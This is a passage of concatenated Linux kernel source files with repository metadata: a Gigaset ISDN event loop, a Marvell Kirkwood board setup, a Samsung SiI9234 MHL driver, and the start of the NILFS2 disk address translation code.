	list_for_each_entry(at_state, &cs->temp_at_states, list)
		if (at_state->pending_commands & PC_HUP) {
			at_state->pending_commands &= ~PC_HUP;
			schedule_sequence(cs, at_state, SEQ_HUP);
			return;
		}

	if (cs->at_state.pending_commands & PC_INIT) {
		cs->at_state.pending_commands &= ~PC_INIT;
		cs->dle = 0;
		cs->inbuf->inputstate = INS_command;
		schedule_sequence(cs, &cs->at_state, SEQ_INIT);
		return;
	}
	if (cs->at_state.pending_commands & PC_SHUTDOWN) {
		cs->at_state.pending_commands &= ~PC_SHUTDOWN;
		schedule_sequence(cs, &cs->at_state, SEQ_SHUTDOWN);
		return;
	}
	if (cs->at_state.pending_commands & PC_CIDMODE) {
		cs->at_state.pending_commands &= ~PC_CIDMODE;
		if (cs->mode == M_UNIMODEM) {
			cs->retry_count = 1;
			schedule_sequence(cs, &cs->at_state, SEQ_CIDMODE);
			return;
		}
	}

	/* per-channel call setup commands */
	for (i = 0; i < cs->channels; ++i) {
		bcs = cs->bcs + i;
		if (bcs->at_state.pending_commands & PC_DLE1) {
			bcs->at_state.pending_commands &= ~PC_DLE1;
			cs->curchannel = bcs->channel;
			schedule_sequence(cs, &cs->at_state, SEQ_DLE1);
			return;
		}
		if (bcs->at_state.pending_commands & PC_ACCEPT) {
			bcs->at_state.pending_commands &= ~PC_ACCEPT;
			schedule_sequence(cs, &bcs->at_state, SEQ_ACCEPT);
			return;
		}
		if (bcs->at_state.pending_commands & PC_DIAL) {
			bcs->at_state.pending_commands &= ~PC_DIAL;
			schedule_sequence(cs, &bcs->at_state, SEQ_DIAL);
			return;
		}
		if (bcs->at_state.pending_commands & PC_CID) {
			switch (cs->mode) {
			case M_UNIMODEM:
				/* must switch to CID mode first */
				cs->at_state.pending_commands |= PC_CIDMODE;
				gig_dbg(DEBUG_EVENT, "Scheduling PC_CIDMODE");
				cs->commands_pending = 1;
				return;
			case M_UNKNOWN:
				schedule_init(cs, MS_INIT);
				return;
			}
			bcs->at_state.pending_commands &= ~PC_CID;
			cs->curchannel = bcs->channel;
			cs->retry_count = 2;
			schedule_sequence(cs, &cs->at_state, SEQ_CID);
			return;
		}
	}
}
/* Drain the event ring buffer.
 * Alternates between processing queued events and re-scanning pending
 * command flags; bounded by 2 * MAX_EVENTS as a livelock safeguard.
 * cs->ev_lock protects the ring indices and is dropped around the
 * actual event / command-flag processing. */
static void process_events(struct cardstate *cs)
{
	struct event_t *ev;
	unsigned head, tail;
	int i;
	int check_flags = 0;
	int was_busy;
	unsigned long flags;

	spin_lock_irqsave(&cs->ev_lock, flags);
	head = cs->ev_head;

	for (i = 0; i < 2 * MAX_EVENTS; ++i) {
		tail = cs->ev_tail;
		if (tail == head) {
			/* ring empty: run the command-flag scan if
			 * requested, otherwise we are done */
			if (!check_flags && !cs->commands_pending)
				break;
			check_flags = 0;
			spin_unlock_irqrestore(&cs->ev_lock, flags);
			process_command_flags(cs);
			spin_lock_irqsave(&cs->ev_lock, flags);
			/* the scan may have queued new events */
			tail = cs->ev_tail;
			if (tail == head) {
				if (!cs->commands_pending)
					break;
				continue;
			}
		}

		ev = cs->events + head;
		was_busy = cs->cur_at_seq != SEQ_NONE;
		spin_unlock_irqrestore(&cs->ev_lock, flags);
		process_event(cs, ev);
		spin_lock_irqsave(&cs->ev_lock, flags);
		/* free any payload process_event() did not take over */
		kfree(ev->ptr);
		ev->ptr = NULL;
		/* re-scan flags once a running sequence has finished */
		if (was_busy && cs->cur_at_seq == SEQ_NONE)
			check_flags = 1;

		head = (head + 1) % MAX_EVENTS;
		cs->ev_head = head;
	}

	spin_unlock_irqrestore(&cs->ev_lock, flags);

	if (i == 2 * MAX_EVENTS) {
		dev_err(cs->dev,
			"infinite loop in process_events; aborting.\n");
	}
}
/* tasklet scheduled on any event received from the Gigaset device
* parameter:
* data ISDN controller state structure
*/
void gigaset_handle_event(unsigned long data)
{
struct cardstate *cs = (struct cardstate *) data;
/* handle incoming data on control/common channel */
if (cs->inbuf->head != cs->inbuf->tail) {
gig_dbg(DEBUG_INTR, "processing new data");
cs->ops->handle_input(cs->inbuf);
}
process_events(cs);
}
| gpl-2.0 |
Nico60/kernel_samsung_smdk4412 | arch/arm/mach-kirkwood/mv88f6281gtw_ge-setup.c | 2818 | 4251 | /*
* arch/arm/mach-kirkwood/mv88f6281gtw_ge-setup.c
*
* Marvell 88F6281 GTW GE Board Setup
*
* This file is licensed under the terms of the GNU General Public
* License version 2. This program is licensed "as is" without any
* warranty of any kind, whether express or implied.
*/
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/platform_device.h>
#include <linux/pci.h>
#include <linux/irq.h>
#include <linux/mtd/physmap.h>
#include <linux/timer.h>
#include <linux/mv643xx_eth.h>
#include <linux/ethtool.h>
#include <linux/gpio.h>
#include <linux/leds.h>
#include <linux/input.h>
#include <linux/gpio_keys.h>
#include <linux/spi/flash.h>
#include <linux/spi/spi.h>
#include <linux/spi/orion_spi.h>
#include <net/dsa.h>
#include <asm/mach-types.h>
#include <asm/mach/arch.h>
#include <asm/mach/pci.h>
#include <mach/kirkwood.h>
#include "common.h"
#include "mpp.h"
/* GbE controller: no PHY - fixed-link 1000/full to the on-board switch */
static struct mv643xx_eth_platform_data mv88f6281gtw_ge_ge00_data = {
	.phy_addr	= MV643XX_ETH_PHY_NONE,
	.speed		= SPEED_1000,
	.duplex		= DUPLEX_FULL,
};

/* DSA switch port naming: 4 LAN ports, one WAN port, CPU uplink */
static struct dsa_chip_data mv88f6281gtw_ge_switch_chip_data = {
	.port_names[0]	= "lan1",
	.port_names[1]	= "lan2",
	.port_names[2]	= "lan3",
	.port_names[3]	= "lan4",
	.port_names[4]	= "wan",
	.port_names[5]	= "cpu",
};

static struct dsa_platform_data mv88f6281gtw_ge_switch_plat_data = {
	.nr_chips	= 1,
	.chip		= &mv88f6281gtw_ge_switch_chip_data,
};

/* SPI NOR flash (Macronix MX25L12805D) on bus 0, CS 0 */
static const struct flash_platform_data mv88f6281gtw_ge_spi_slave_data = {
	.type		= "mx25l12805d",
};

static struct spi_board_info __initdata mv88f6281gtw_ge_spi_slave_info[] = {
	{
		.modalias	= "m25p80",
		.platform_data	= &mv88f6281gtw_ge_spi_slave_data,
		.irq		= -1,
		.max_speed_hz	= 50000000,
		.bus_num	= 0,
		.chip_select	= 0,
	},
};

/* front panel buttons, both active low */
static struct gpio_keys_button mv88f6281gtw_ge_button_pins[] = {
	{
		.code		= KEY_RESTART,
		.gpio		= 47,
		.desc		= "SWR Button",
		.active_low	= 1,
	}, {
		.code		= KEY_WPS_BUTTON,
		.gpio		= 46,
		.desc		= "WPS Button",
		.active_low	= 1,
	},
};

static struct gpio_keys_platform_data mv88f6281gtw_ge_button_data = {
	.buttons	= mv88f6281gtw_ge_button_pins,
	.nbuttons	= ARRAY_SIZE(mv88f6281gtw_ge_button_pins),
};

static struct platform_device mv88f6281gtw_ge_buttons = {
	.name		= "gpio-keys",
	.id		= -1,
	.num_resources	= 0,
	.dev		= {
		.platform_data	= &mv88f6281gtw_ge_button_data,
	},
};

/* front panel LEDs, all active high */
static struct gpio_led mv88f6281gtw_ge_led_pins[] = {
	{
		.name		= "gtw:green:Status",
		.gpio		= 20,
		.active_low	= 0,
	}, {
		.name		= "gtw:red:Status",
		.gpio		= 21,
		.active_low	= 0,
	}, {
		.name		= "gtw:green:USB",
		.gpio		= 12,
		.active_low	= 0,
	},
};

static struct gpio_led_platform_data mv88f6281gtw_ge_led_data = {
	.leds		= mv88f6281gtw_ge_led_pins,
	.num_leds	= ARRAY_SIZE(mv88f6281gtw_ge_led_pins),
};

static struct platform_device mv88f6281gtw_ge_leds = {
	.name	= "leds-gpio",
	.id	= -1,
	.dev	= {
		.platform_data	= &mv88f6281gtw_ge_led_data,
	},
};

/* multi-purpose pin mux: LED outputs plus button inputs; 0-terminated */
static unsigned int mv88f6281gtw_ge_mpp_config[] __initdata = {
	MPP12_GPO,	/* Status#_USB pin */
	MPP20_GPIO,	/* Status#_GLED pin */
	MPP21_GPIO,	/* Status#_RLED pin */
	MPP46_GPIO,	/* WPS_Switch pin */
	MPP47_GPIO,	/* SW_Init pin */
	0
};
/* board init: bring up SoC peripherals and register board devices.
 * kirkwood_init()/mpp_conf() must run before any peripheral init, so
 * keep the call order. */
static void __init mv88f6281gtw_ge_init(void)
{
	/*
	 * Basic setup. Needs to be called early.
	 */
	kirkwood_init();
	kirkwood_mpp_conf(mv88f6281gtw_ge_mpp_config);

	kirkwood_ehci_init();
	kirkwood_ge00_init(&mv88f6281gtw_ge_ge00_data);
	kirkwood_ge00_switch_init(&mv88f6281gtw_ge_switch_plat_data, NO_IRQ);
	spi_register_board_info(mv88f6281gtw_ge_spi_slave_info,
				ARRAY_SIZE(mv88f6281gtw_ge_spi_slave_info));
	kirkwood_spi_init();
	kirkwood_uart0_init();
	platform_device_register(&mv88f6281gtw_ge_leds);
	platform_device_register(&mv88f6281gtw_ge_buttons);
}
/* register the PCIe root complex, but only when running on this board */
static int __init mv88f6281gtw_ge_pci_init(void)
{
	if (!machine_is_mv88f6281gtw_ge())
		return 0;

	kirkwood_pcie_init(KW_PCIE0);
	return 0;
}
subsys_initcall(mv88f6281gtw_ge_pci_init);
/* machine descriptor; generic entry points come from the kirkwood core */
MACHINE_START(MV88F6281GTW_GE, "Marvell 88F6281 GTW GE Board")
	/* Maintainer: Lennert Buytenhek <buytenh@marvell.com> */
	.boot_params	= 0x00000100,
	.init_machine	= mv88f6281gtw_ge_init,
	.map_io		= kirkwood_map_io,
	.init_early	= kirkwood_init_early,
	.init_irq	= kirkwood_init_irq,
	.timer		= &kirkwood_timer,
MACHINE_END
| gpl-2.0 |
baselsayeh/Kyleopen-4.4 | drivers/media/video/s5p-tv/sii9234_drv.c | 4866 | 10938 | /*
* Samsung MHL interface driver
*
* Copyright (C) 2011 Samsung Electronics Co.Ltd
* Author: Tomasz Stanislawski <t.stanislaws@samsung.com>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*/
#include <linux/delay.h>
#include <linux/err.h>
#include <linux/freezer.h>
#include <linux/gpio.h>
#include <linux/i2c.h>
#include <linux/interrupt.h>
#include <linux/irq.h>
#include <linux/kthread.h>
#include <linux/module.h>
#include <linux/pm_runtime.h>
#include <linux/regulator/machine.h>
#include <linux/slab.h>
#include <mach/gpio.h>
#include <plat/gpio-cfg.h>
#include <media/sii9234.h>
#include <media/v4l2-subdev.h>
MODULE_AUTHOR("Tomasz Stanislawski <t.stanislaws@samsung.com>");
MODULE_DESCRIPTION("Samsung MHL interface driver");
MODULE_LICENSE("GPL");
/* per-device driver state */
struct sii9234_context {
	struct i2c_client *client;	/* I2C link to the chip */
	struct regulator *power;	/* "hdmi-en" supply */
	int gpio_n_reset;		/* active-low reset GPIO */
	struct v4l2_subdev sd;		/* embedded V4L2 subdevice */
};

/* map an embedded v4l2_subdev back to its containing context */
static inline struct sii9234_context *sd_to_context(struct v4l2_subdev *sd)
{
	return container_of(sd, struct sii9234_context, sd);
}
/* read one byte from a direct register; negative value on I2C error */
static inline int sii9234_readb(struct i2c_client *client, int addr)
{
	return i2c_smbus_read_byte_data(client, addr);
}

/* write one byte to a direct register; negative value on I2C error */
static inline int sii9234_writeb(struct i2c_client *client, int addr, int value)
{
	return i2c_smbus_write_byte_data(client, addr, value);
}
/* read-modify-write: update only the bits selected by @mask */
static inline int sii9234_writeb_mask(struct i2c_client *client, int addr,
	int value, int mask)
{
	int old;

	old = i2c_smbus_read_byte_data(client, addr);
	if (old < 0)
		return old;

	old &= ~mask;
	old |= value & mask;
	return i2c_smbus_write_byte_data(client, addr, old);
}
/* read a byte from an indexed (paged) register: the 16-bit address is
 * loaded into the index window at 0xbc/0xbd, data is read from 0xbe */
static inline int sii9234_readb_idx(struct i2c_client *client, int addr)
{
	int ret;
	ret = i2c_smbus_write_byte_data(client, 0xbc, addr >> 8);
	if (ret < 0)
		return ret;
	ret = i2c_smbus_write_byte_data(client, 0xbd, addr & 0xff);
	if (ret < 0)
		return ret;
	return i2c_smbus_read_byte_data(client, 0xbe);
}

/* write a byte to an indexed (paged) register via the same 0xbc-0xbe
 * index window */
static inline int sii9234_writeb_idx(struct i2c_client *client, int addr,
	int value)
{
	int ret;
	ret = i2c_smbus_write_byte_data(client, 0xbc, addr >> 8);
	if (ret < 0)
		return ret;
	ret = i2c_smbus_write_byte_data(client, 0xbd, addr & 0xff);
	if (ret < 0)
		return ret;
	ret = i2c_smbus_write_byte_data(client, 0xbe, value);
	return ret;
}
/* read-modify-write on an indexed register: touch only @mask bits */
static inline int sii9234_writeb_idx_mask(struct i2c_client *client, int addr,
	int value, int mask)
{
	int old;

	old = sii9234_readb_idx(client, addr);
	if (old < 0)
		return old;

	old = (old & ~mask) | (value & mask);
	return sii9234_writeb_idx(client, addr, old);
}
/* hard-reset the chip via the reset GPIO and wait until the TPI
 * interface answers.  Returns 0 on success, negative error otherwise. */
static int sii9234_reset(struct sii9234_context *ctx)
{
	struct i2c_client *client = ctx->client;
	struct device *dev = &client->dev;
	int ret, tries;

	/* pulse the active-low reset line; 1 ms settle between edges */
	gpio_direction_output(ctx->gpio_n_reset, 1);
	mdelay(1);
	gpio_direction_output(ctx->gpio_n_reset, 0);
	mdelay(1);
	gpio_direction_output(ctx->gpio_n_reset, 1);
	mdelay(1);

	/* going to TTPI mode */
	ret = sii9234_writeb(client, 0xc7, 0);
	if (ret < 0) {
		dev_err(dev, "failed to set TTPI mode\n");
		return ret;
	}
	/* poll register 0x1b until the chip responds (up to ~100 ms) */
	for (tries = 0; tries < 100 ; ++tries) {
		ret = sii9234_readb(client, 0x1b);
		if (ret > 0)
			break;
		if (ret < 0) {
			dev_err(dev, "failed to reset device\n");
			return -EIO;
		}
		mdelay(1);
	}
	if (tries == 100) {
		dev_err(dev, "maximal number of tries reached\n");
		return -EIO;
	}
	return 0;
}
/* read and log the chip identification registers; fail with -ENODEV
 * unless the device identifies itself as a SiI9234 */
static int sii9234_verify_version(struct i2c_client *client)
{
	struct device *dev = &client->dev;
	int family, rev, tpi_rev, dev_id, sub_id, hdcp, id;

	family = sii9234_readb(client, 0x1b);
	rev = sii9234_readb(client, 0x1c) & 0x0f;
	tpi_rev = sii9234_readb(client, 0x1d) & 0x7f;
	dev_id = sii9234_readb_idx(client, 0x0103);
	sub_id = sii9234_readb_idx(client, 0x0102);
	hdcp = sii9234_readb(client, 0x30);

	/* any negative value means the I2C access itself failed */
	if (family < 0 || rev < 0 || tpi_rev < 0 || dev_id < 0 ||
	    sub_id < 0 || hdcp < 0) {
		dev_err(dev, "failed to read chip's version\n");
		return -EIO;
	}

	id = (dev_id << 8) | sub_id;
	dev_info(dev, "chip: SiL%02x family: %02x, rev: %02x\n",
		 id, family, rev);
	dev_info(dev, "tpi_rev:%02x, hdcp: %02x\n", tpi_rev, hdcp);
	if (id != 0x9234) {
		dev_err(dev, "not supported chip\n");
		return -ENODEV;
	}
	return 0;
}
/* chip init table: each row is { register page, offset, value },
 * written via sii9234_writeb_idx() by sii9234_set_internal() */
static u8 data[][3] = {
	/* setup from driver created by doonsoo45.kim */
	{ 0x01, 0x05, 0x04 }, /* Enable Auto soft reset on SCDT = 0 */
	{ 0x01, 0x08, 0x35 }, /* Power Up TMDS Tx Core */
	{ 0x01, 0x0d, 0x1c }, /* HDMI Transcode mode enable */
	{ 0x01, 0x2b, 0x01 }, /* Enable HDCP Compliance workaround */
	{ 0x01, 0x79, 0x40 }, /* daniel test...MHL_INT */
	{ 0x01, 0x80, 0x34 }, /* Enable Rx PLL Clock Value */
	{ 0x01, 0x90, 0x27 }, /* Enable CBUS discovery */
	{ 0x01, 0x91, 0xe5 }, /* Skip RGND detection */
	{ 0x01, 0x92, 0x46 }, /* Force MHD mode */
	{ 0x01, 0x93, 0xdc }, /* Disable CBUS pull-up during RGND measurement */
	{ 0x01, 0x94, 0x66 }, /* 1.8V CBUS VTH & GND threshold */
	{ 0x01, 0x95, 0x31 }, /* RGND block & single discovery attempt */
	{ 0x01, 0x96, 0x22 }, /* use 1K and 2K setting */
	{ 0x01, 0xa0, 0x10 }, /* SIMG: Term mode */
	{ 0x01, 0xa1, 0xfc }, /* Disable internal Mobile HD driver */
	{ 0x01, 0xa3, 0xfa }, /* SIMG: Output Swing default EB, 3x Clk Mult */
	{ 0x01, 0xa5, 0x80 }, /* SIMG: RGND Hysterisis, 3x mode for Beast */
	{ 0x01, 0xa6, 0x0c }, /* SIMG: Swing Offset */
	{ 0x02, 0x3d, 0x3f }, /* Power up CVCC 1.2V core */
	{ 0x03, 0x00, 0x00 }, /* SIMG: correcting HW default */
	{ 0x03, 0x11, 0x01 }, /* Enable TxPLL Clock */
	{ 0x03, 0x12, 0x15 }, /* Enable Tx Clock Path & Equalizer */
	{ 0x03, 0x13, 0x60 }, /* SIMG: Set termination value */
	{ 0x03, 0x14, 0xf0 }, /* SIMG: Change CKDT level */
	{ 0x03, 0x17, 0x07 }, /* SIMG: PLL Calrefsel */
	{ 0x03, 0x1a, 0x20 }, /* VCO Cal */
	{ 0x03, 0x22, 0xe0 }, /* SIMG: Auto EQ */
	{ 0x03, 0x23, 0xc0 }, /* SIMG: Auto EQ */
	{ 0x03, 0x24, 0xa0 }, /* SIMG: Auto EQ */
	{ 0x03, 0x25, 0x80 }, /* SIMG: Auto EQ */
	{ 0x03, 0x26, 0x60 }, /* SIMG: Auto EQ */
	{ 0x03, 0x27, 0x40 }, /* SIMG: Auto EQ */
	{ 0x03, 0x28, 0x20 }, /* SIMG: Auto EQ */
	{ 0x03, 0x29, 0x00 }, /* SIMG: Auto EQ */
	{ 0x03, 0x31, 0x0b }, /* SIMG: Rx PLL BW value from I2C BW ~ 4MHz */
	{ 0x03, 0x45, 0x06 }, /* SIMG: DPLL Mode */
	{ 0x03, 0x4b, 0x06 }, /* SIMG: Correcting HW default */
	{ 0x03, 0x4c, 0xa0 }, /* Manual zone control */
	{ 0x03, 0x4d, 0x02 }, /* SIMG: PLL Mode Value (order is important) */
};
/* push the static init table to the chip; stop at the first failure */
static int sii9234_set_internal(struct sii9234_context *ctx)
{
	struct i2c_client *client = ctx->client;
	int i, ret;

	for (i = 0; i < ARRAY_SIZE(data); ++i) {
		int reg = (data[i][0] << 8) | data[i][1];

		ret = sii9234_writeb_idx(client, reg, data[i][2]);
		if (ret < 0)
			return ret;
	}

	return 0;
}
/* runtime PM suspend: power down the chip and cut its supply */
static int sii9234_runtime_suspend(struct device *dev)
{
	struct v4l2_subdev *sd = dev_get_drvdata(dev);
	struct sii9234_context *ctx = sd_to_context(sd);
	struct i2c_client *client = ctx->client;

	dev_info(dev, "suspend start\n");
	/* NOTE(review): the write result is ignored - presumably a
	 * best-effort power-down before the regulator is cut; confirm
	 * this is intentional */
	sii9234_writeb_mask(client, 0x1e, 3, 3);
	regulator_disable(ctx->power);
	return 0;
}
/* runtime PM resume: power the chip, reset it and reload the init
 * table.  Returns 0 on success, negative error otherwise. */
static int sii9234_runtime_resume(struct device *dev)
{
	struct v4l2_subdev *sd = dev_get_drvdata(dev);
	struct sii9234_context *ctx = sd_to_context(sd);
	struct i2c_client *client = ctx->client;
	int ret;

	dev_info(dev, "resume start\n");
	/* fix: regulator_enable() can fail and its result was ignored;
	 * on failure there is nothing to roll back, so return directly */
	ret = regulator_enable(ctx->power);
	if (ret < 0) {
		dev_err(dev, "failed to resume\n");
		return ret;
	}

	ret = sii9234_reset(ctx);
	if (ret)
		goto fail;

	/* enable tpi */
	/* NOTE(review): mask 0 makes this rewrite reg 0x1e unchanged -
	 * looks like a nonzero mask was intended; confirm against the
	 * datasheet before changing */
	ret = sii9234_writeb_mask(client, 0x1e, 1, 0);
	if (ret < 0)
		goto fail;
	ret = sii9234_set_internal(ctx);
	if (ret < 0)
		goto fail;

	return 0;

fail:
	dev_err(dev, "failed to resume\n");
	regulator_disable(ctx->power);
	return ret;
}
/* runtime PM callbacks; no system sleep handlers are provided */
static const struct dev_pm_ops sii9234_pm_ops = {
	.runtime_suspend = sii9234_runtime_suspend,
	.runtime_resume	 = sii9234_runtime_resume,
};
/* V4L2 s_power: route power requests to runtime PM.
 * pm_runtime_get_sync() can return a positive value (e.g. device was
 * already active), which is not an error. */
static int sii9234_s_power(struct v4l2_subdev *sd, int on)
{
	struct sii9234_context *ctx = sd_to_context(sd);
	int ret;

	if (on)
		ret = pm_runtime_get_sync(&ctx->client->dev);
	else
		ret = pm_runtime_put(&ctx->client->dev);
	/* only values < 0 indicate errors; IS_ERR_VALUE() is meant for
	 * pointer-encoded errnos, not plain ints - test the sign instead */
	return ret < 0 ? ret : 0;
}
/* V4L2 s_stream: toggle bit 4 of register 0x1a
 * (clear to enable TDMS output, set to disable it) */
static int sii9234_s_stream(struct v4l2_subdev *sd, int enable)
{
	struct sii9234_context *ctx = sd_to_context(sd);
	int value = enable ? 0 : ~0;

	sii9234_writeb_mask(ctx->client, 0x1a, value, 1 << 4);
	return 0;
}
/* V4L2 subdevice operation tables */
static const struct v4l2_subdev_core_ops sii9234_core_ops = {
	.s_power =  sii9234_s_power,
};

static const struct v4l2_subdev_video_ops sii9234_video_ops = {
	.s_stream =  sii9234_s_stream,
};

static const struct v4l2_subdev_ops sii9234_ops = {
	.core = &sii9234_core_ops,
	.video = &sii9234_video_ops,
};
/* probe: allocate context, acquire regulator and reset GPIO, register
 * the V4L2 subdevice, power the chip once to verify its identity, then
 * power it back down.  Resources are unwound in reverse order via the
 * fail_* labels. */
static int __devinit sii9234_probe(struct i2c_client *client,
	const struct i2c_device_id *id)
{
	struct device *dev = &client->dev;
	struct sii9234_platform_data *pdata = dev->platform_data;
	struct sii9234_context *ctx;
	int ret;

	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
	if (!ctx) {
		dev_err(dev, "out of memory\n");
		ret = -ENOMEM;
		goto fail;
	}
	ctx->client = client;

	ctx->power = regulator_get(dev, "hdmi-en");
	if (IS_ERR(ctx->power)) {
		dev_err(dev, "failed to acquire regulator hdmi-en\n");
		ret = PTR_ERR(ctx->power);
		goto fail_ctx;
	}

	ctx->gpio_n_reset = pdata->gpio_n_reset;
	ret = gpio_request(ctx->gpio_n_reset, "MHL_RST");
	if (ret) {
		dev_err(dev, "failed to acquire MHL_RST gpio\n");
		goto fail_power;
	}

	v4l2_i2c_subdev_init(&ctx->sd, client, &sii9234_ops);

	pm_runtime_enable(dev);

	/* enable device */
	ret = pm_runtime_get_sync(dev);
	if (ret)
		goto fail_pm;

	/* verify chip version */
	ret = sii9234_verify_version(client);
	if (ret)
		goto fail_pm_get;

	/* stop processing */
	pm_runtime_put(dev);

	dev_info(dev, "probe successful\n");

	return 0;

fail_pm_get:
	pm_runtime_put_sync(dev);

fail_pm:
	pm_runtime_disable(dev);
	gpio_free(ctx->gpio_n_reset);

fail_power:
	regulator_put(ctx->power);

fail_ctx:
	kfree(ctx);

fail:
	dev_err(dev, "probe failed\n");

	return ret;
}
/* remove: release resources acquired in probe, in reverse order */
static int __devexit sii9234_remove(struct i2c_client *client)
{
	struct device *dev = &client->dev;
	struct v4l2_subdev *sd = i2c_get_clientdata(client);
	struct sii9234_context *ctx = sd_to_context(sd);

	pm_runtime_disable(dev);
	gpio_free(ctx->gpio_n_reset);
	regulator_put(ctx->power);
	kfree(ctx);

	dev_info(dev, "remove successful\n");

	return 0;
}
/* I2C device ID table; sentinel-terminated */
static const struct i2c_device_id sii9234_id[] = {
	{ "SII9234", 0 },
	{ },
};
MODULE_DEVICE_TABLE(i2c, sii9234_id);

static struct i2c_driver sii9234_driver = {
	.driver = {
		.name	= "sii9234",
		.owner	= THIS_MODULE,
		.pm = &sii9234_pm_ops,
	},
	.probe		= sii9234_probe,
	.remove		= __devexit_p(sii9234_remove),
	.id_table = sii9234_id,
};
/* module entry/exit: register/unregister the I2C driver */
static int __init sii9234_init(void)
{
	return i2c_add_driver(&sii9234_driver);
}
module_init(sii9234_init);

static void __exit sii9234_exit(void)
{
	i2c_del_driver(&sii9234_driver);
}
module_exit(sii9234_exit);
| gpl-2.0 |
baolfire/aries_kernel_pexcn | fs/nilfs2/dat.c | 4866 | 13261 | /*
* dat.c - NILFS disk address translation.
*
* Copyright (C) 2006-2008 Nippon Telegraph and Telephone Corporation.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
* Written by Koji Sato <koji@osrg.net>.
*/
#include <linux/types.h>
#include <linux/buffer_head.h>
#include <linux/string.h>
#include <linux/errno.h>
#include "nilfs.h"
#include "mdt.h"
#include "alloc.h"
#include "dat.h"
/* bounds of the checkpoint number range stored in DAT entry lifetimes */
#define NILFS_CNO_MIN	((__u64)1)
#define NILFS_CNO_MAX	(~(__u64)0)

/* DAT file private data: base metadata-file info plus the persistent
 * object allocator cache and a shadow map */
struct nilfs_dat_info {
	struct nilfs_mdt_info mi;
	struct nilfs_palloc_cache palloc_cache;
	struct nilfs_shadow_map shadow;
};

/* cast the generic mdt info of the DAT inode to its private type */
static inline struct nilfs_dat_info *NILFS_DAT_I(struct inode *dat)
{
	return (struct nilfs_dat_info *)NILFS_MDT(dat);
}
/* load (optionally creating) the block holding the DAT entry for
 * req->pr_entry_nr; the buffer reference is stored in req->pr_entry_bh */
static int nilfs_dat_prepare_entry(struct inode *dat,
				   struct nilfs_palloc_req *req, int create)
{
	return nilfs_palloc_get_entry_block(dat, req->pr_entry_nr,
					    create, &req->pr_entry_bh);
}

/* mark the entry block and the DAT inode dirty, then release the
 * buffer reference taken by nilfs_dat_prepare_entry() */
static void nilfs_dat_commit_entry(struct inode *dat,
				   struct nilfs_palloc_req *req)
{
	mark_buffer_dirty(req->pr_entry_bh);
	nilfs_mdt_mark_dirty(dat);
	brelse(req->pr_entry_bh);
}

/* release the buffer reference without dirtying anything */
static void nilfs_dat_abort_entry(struct inode *dat,
				  struct nilfs_palloc_req *req)
{
	brelse(req->pr_entry_bh);
}
/* reserve a new DAT entry and load its entry block; on failure of the
 * second step the allocator reservation is rolled back */
int nilfs_dat_prepare_alloc(struct inode *dat, struct nilfs_palloc_req *req)
{
	int err;

	err = nilfs_palloc_prepare_alloc_entry(dat, req);
	if (err < 0)
		return err;

	err = nilfs_dat_prepare_entry(dat, req, 1);
	if (err < 0)
		nilfs_palloc_abort_alloc_entry(dat, req);

	return err;
}
/* finish an allocation: initialize the fresh entry as unassigned
 * (start = CNO_MIN, end = CNO_MAX, blocknr = 0) under kmap_atomic */
void nilfs_dat_commit_alloc(struct inode *dat, struct nilfs_palloc_req *req)
{
	struct nilfs_dat_entry *entry;
	void *kaddr;

	kaddr = kmap_atomic(req->pr_entry_bh->b_page);
	entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
					     req->pr_entry_bh, kaddr);
	entry->de_start = cpu_to_le64(NILFS_CNO_MIN);
	entry->de_end = cpu_to_le64(NILFS_CNO_MAX);
	entry->de_blocknr = cpu_to_le64(0);
	kunmap_atomic(kaddr);

	nilfs_palloc_commit_alloc_entry(dat, req);
	nilfs_dat_commit_entry(dat, req);
}

/* roll back a prepared allocation */
void nilfs_dat_abort_alloc(struct inode *dat, struct nilfs_palloc_req *req)
{
	nilfs_dat_abort_entry(dat, req);
	nilfs_palloc_abort_alloc_entry(dat, req);
}

/* free an entry: reset its lifetime to the empty range
 * [CNO_MIN, CNO_MIN) and return it to the allocator */
static void nilfs_dat_commit_free(struct inode *dat,
				  struct nilfs_palloc_req *req)
{
	struct nilfs_dat_entry *entry;
	void *kaddr;

	kaddr = kmap_atomic(req->pr_entry_bh->b_page);
	entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
					     req->pr_entry_bh, kaddr);
	entry->de_start = cpu_to_le64(NILFS_CNO_MIN);
	entry->de_end = cpu_to_le64(NILFS_CNO_MIN);
	entry->de_blocknr = cpu_to_le64(0);
	kunmap_atomic(kaddr);

	nilfs_dat_commit_entry(dat, req);
	nilfs_palloc_commit_free_entry(dat, req);
}
/* load the entry block of an already-allocated entry; the entry is
 * expected to exist, hence the WARN on -ENOENT */
int nilfs_dat_prepare_start(struct inode *dat, struct nilfs_palloc_req *req)
{
	int ret;

	ret = nilfs_dat_prepare_entry(dat, req, 0);
	WARN_ON(ret == -ENOENT);
	return ret;
}

/* start the entry's lifetime: record the current checkpoint number as
 * de_start and bind the entry to @blocknr */
void nilfs_dat_commit_start(struct inode *dat, struct nilfs_palloc_req *req,
			    sector_t blocknr)
{
	struct nilfs_dat_entry *entry;
	void *kaddr;

	kaddr = kmap_atomic(req->pr_entry_bh->b_page);
	entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
					     req->pr_entry_bh, kaddr);
	entry->de_start = cpu_to_le64(nilfs_mdt_cno(dat));
	entry->de_blocknr = cpu_to_le64(blocknr);
	kunmap_atomic(kaddr);

	nilfs_dat_commit_entry(dat, req);
}
/* prepare to end an entry's lifetime; if the entry was never bound to
 * a disk block (blocknr == 0) also reserve its deallocation */
int nilfs_dat_prepare_end(struct inode *dat, struct nilfs_palloc_req *req)
{
	struct nilfs_dat_entry *entry;
	__u64 start;
	sector_t blocknr;
	void *kaddr;
	int ret;

	ret = nilfs_dat_prepare_entry(dat, req, 0);
	if (ret < 0) {
		WARN_ON(ret == -ENOENT);
		return ret;
